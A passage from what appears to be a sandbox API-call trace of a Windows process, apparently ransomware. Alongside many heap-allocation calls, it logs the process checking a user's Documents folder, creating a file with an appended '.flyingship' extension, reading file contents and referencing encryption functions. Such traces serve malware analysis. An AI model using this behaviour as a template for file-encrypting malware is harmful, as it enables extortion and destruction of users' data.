lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0173.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0173.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0173.462] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0173.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0173.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0173.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0173.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xjtjup63.flyingship.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0173.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0173.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0173.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0173.465] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0173.465] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0xea9a, lpOverlapped=0x0) returned 1 [0173.468] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0173.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xea9a) returned 0xa7f018 [0173.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0173.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xea9a) returned 0xa8dac0 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xea9a) returned 0xa7f018 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0173.471] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.471] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xea9a) returned 0xa7f018 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0173.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0173.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xea9a) returned 0x9c5180 [0173.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0173.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0173.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.474] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0173.474] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0173.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.474] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0173.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0173.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.475] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 